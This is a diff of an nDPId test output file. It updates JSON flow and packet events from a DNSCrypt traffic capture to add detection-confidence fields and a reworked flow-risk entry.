AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":509,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396070,"flow_last_seen":946739396070,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739396070,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.55","src_port":33246,"dst_port":8443,"l4_proto":"udp","ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":509,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396070,"flow_last_seen":946739396070,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739396070,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.55","src_port":33246,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00427{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":510,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"ts_msec":946739396070,"pkt":"REREREREZmZmZmZmCABFAABQSFkAuX4RO7QKAAABLuPINwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
 00209{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":510,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60}
 00427{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":511,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"ts_msec":946739396070,"pkt":"REREREREZmZmZmZmCABFAABQSFoAuX4RO7MKAAABLuPINwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
 00209{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":511,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60}
 00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":512,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396070,"flow_last_seen":946739396070,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739396070,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.55","src_port":50277,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01136{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":512,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":214,"flow_packet_id":1,"flow_last_seen":946739396070,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"ts_msec":946739396070,"pkt":"REREREREZmZmZmZmCABFAAIcSFtAAH4R+p4KAAABLuPIN8RlIPsCCLnwFdEBAAABAAAAAAABATINZG5zY3J5cHQtY2VydARyZG5zBmZhZWxpeANuZXQAABAAAQAAAAAAAAAAAAHEAAwBwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":512,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396070,"flow_last_seen":946739396070,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739396070,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.55","src_port":50277,"dst_port":8443,"l4_proto":"udp","ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":512,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396070,"flow_last_seen":946739396070,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739396070,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.55","src_port":50277,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00600{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":513,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396070,"flow_last_seen":946739396070,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739396070,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.55","src_port":44161,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02419{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":513,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":215,"flow_packet_id":1,"flow_last_seen":946739396070,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":946739396070,"pkt":"REREREREZmZmZmZmCABFAAXcSFwgAH4RFt4KAAABLuPIN6yBIPsGBB0zFdIBAAABAAAAAAABATINZG5zY3J5cHQtY2VydARyZG5zBmZhZWxpeANuZXQAABAAAQAAAAAAAAAAAAXAAAwFvAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":513,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396070,"flow_last_seen":946739396070,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739396070,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.55","src_port":44161,"dst_port":8443,"l4_proto":"udp","ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":513,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396070,"flow_last_seen":946739396070,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739396070,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.55","src_port":44161,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00427{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":514,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"ts_msec":946739396070,"pkt":"REREREREZmZmZmZmCABFAABQSFwAuX4RO7EKAAABLuPINwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
 00209{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":514,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60}
 00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":515,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396070,"flow_last_seen":946739396070,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739396070,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.55","src_port":49177,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01136{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":515,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":216,"flow_packet_id":1,"flow_last_seen":946739396070,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"ts_msec":946739396070,"pkt":"REREREREZmZmZmZmCABFAAIcSF1AAH4R+pwKAAABLuPIN8AZIPsCCLnwFc8BAAABAAAAAAABATINZG5zY3J5cHQtY2VydARyZG5zBmZhZWxpeANuZXQAABAAAQAAAAAAAAAAAAHEAAwBwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":515,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396070,"flow_last_seen":946739396070,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739396070,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.55","src_port":49177,"dst_port":8443,"l4_proto":"udp","ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":515,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396070,"flow_last_seen":946739396070,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739396070,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.55","src_port":49177,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00696{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":516,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":208,"flow_packet_id":2,"flow_last_seen":946739396071,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":225,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":225,"pkt_l4_len":191,"ts_msec":946739396071,"pkt":"ZmZmZmZmRERERERECABFAADTkQhAADcR9haQW2rjCgAAAQG71CEAvwNXZlqBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdANvbmUAABAAAcAMABAAAQAAcIAAfXxETlNDAAIAALkTa3PmYOnbKVsenPA+dUbqb7bPdeethm+r51VaewMcP0sfe1RtTAHcc8Uvs8bFQylZgA4Na3Yk4xgl2KWmKw4bPctGhBgarq2J2ya3ifLfvYsxbqqez8iaBEin48TCXxs9y0aEGBquAAAAAV9TgfdfVNN3"}
 00696{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":517,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":205,"flow_packet_id":2,"flow_last_seen":946739396071,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":225,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":225,"pkt_l4_len":191,"ts_msec":946739396071,"pkt":"ZmZmZmZmRERERERECABFAADTkQVAADcR9hmQW2rjCgAAAQG7vKwAvxrIZl6BgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdANvbmUAABAAAcAMABAAAQAAcIAAfXxETlNDAAIAALkTa3PmYOnbKVsenPA+dUbqb7bPdeethm+r51VaewMcP0sfe1RtTAHcc8Uvs8bFQylZgA4Na3Yk4xgl2KWmKw4bPctGhBgarq2J2ya3ifLfvYsxbqqez8iaBEin48TCXxs9y0aEGBquAAAAAV9TgfdfVNN3"}
 00696{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":518,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":207,"flow_packet_id":2,"flow_last_seen":946739396073,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":225,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":225,"pkt_l4_len":191,"ts_msec":946739396073,"pkt":"ZmZmZmZmRERERERECABFAADTkQdAADcR9heQW2rjCgAAAQG7vG0AvxsMZlmBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdANvbmUAABAAAcAMABAAAQAAcIAAfXxETlNDAAIAALkTa3PmYOnbKVsenPA+dUbqb7bPdeethm+r51VaewMcP0sfe1RtTAHcc8Uvs8bFQylZgA4Na3Yk4xgl2KWmKw4bPctGhBgarq2J2ya3ifLfvYsxbqqez8iaBEin48TCXxs9y0aEGBquAAAAAV9TgfdfVNN3"}
@@ -1078,24 +1078,24 @@
 00704{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":525,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":215,"flow_packet_id":2,"flow_last_seen":946739396110,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":228,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":228,"pkt_l4_len":194,"ts_msec":946739396110,"pkt":"ZmZmZmZmRERERERECABFAADWzC9AADcRvxAu48g3CgAAASD7rIEAwu03FdKAAAABAAEAAAAAATINZG5zY3J5cHQtY2VydARyZG5zBmZhZWxpeANuZXQAABAAAcAMABAAAQAADhAAfXxETlNDAAEAADn5TxO0FAodB0MfyNII\/q4yfvBzna8lha8rHqMZH6brB0hzmteXf96oRMNtUVCp592lxf62HHwuDSbhBbtGtQcalorpuHO8PTt\/PSXI1nToKeQ\/\/4xUAF+WFp6Iz9p9KhqWium4c7w9AAAAAV7URQBxousA"}
 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":526,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":217,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396111,"flow_last_seen":946739396111,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739396111,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"107.170.57.34","src_port":54375,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01136{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":526,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":217,"flow_packet_id":1,"flow_last_seen":946739396111,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"ts_msec":946739396111,"pkt":"REREREREZmZmZmZmCABFAAIcKehAAH4Ra2AKAAABa6o5ItRnAbsCCGeiszEBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdAl2ZW50cmljbGUCdXMAABAAAQAAAAAAAAAAAAG+AAwBugAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00683{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":526,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":217,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396111,"flow_last_seen":946739396111,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739396111,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"107.170.57.34","src_port":54375,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00792{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":526,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":217,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396111,"flow_last_seen":946739396111,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739396111,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"107.170.57.34","src_port":54375,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":527,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396111,"flow_last_seen":946739396111,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739396111,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"107.170.57.34","src_port":55185,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
